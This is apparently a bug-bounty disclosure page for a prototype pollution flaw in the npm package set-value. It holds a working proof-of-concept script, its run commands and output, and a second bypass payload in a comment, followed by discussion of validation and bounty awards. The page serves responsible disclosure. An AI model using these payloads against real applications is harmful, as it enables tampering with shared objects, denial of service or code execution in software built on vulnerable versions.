Prototype Pollution in jonschlinkert/set-value

Valid

Reported on

Aug 30th 2021


✍️ Description

set-value package is vulnerable to Prototype Pollution. The set function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var setValue = require("set-value")
let obj = {}
console.log("Before: " + {}.polluted)
setValue(obj, [['__proto__'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Execute the following commands in the terminal:

npm i set-value # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

ready-research submitted a
24 days ago
ready-research
24 days ago

Researcher


var setValue = require("set-value") let obj = {} console.log("Before: " + {}.polluted) setValue(obj, [['constructor'],['prototype'], 'polluted'], 'Yes! Its Polluted') console.log("After: " + {}.polluted)

Jon Schlinkert validated this vulnerability 11 days ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
ready-research
11 days ago

Researcher


@admin @adam please read the comments in https://github.com/jonschlinkert/set-value/pull/33

Jamie Slome
10 days ago

Admin


@ready-research - I have commented on the GitHub pull request.

Chad Whitacre
a day ago

Based on the PR in set-value it seems that @ready-research should be awarded the fix bounty. Is there no way to do that without the repo maintainer's cooperation? Clearly you can't force the repo maintainer to cooperate, and it seems unfair to @ready-research not to override somehow here.

Jamie Slome
a day ago

Admin


@chad - we are improving our automation in this - generally our system would have picked it up if the permalink reference in the report had matched that of the fix.

But seeing as @ready-research's fix was used - we will definitely look to reward the bounty here.

Thanks for your feedback! 🎉

Jamie Slome confirmed that a fix has been merged on b057b1 a day ago
ready-research has been awarded the fix bounty
Jamie Slome
a day ago

Admin


@ready-research - just a heads up that in the future, avoid opening the PR in public, as it can break the responsible disclosure.

Great work all!

ready-research
a day ago

Researcher


@chad Thank you.

@jamie Yeah, sure. Thanks.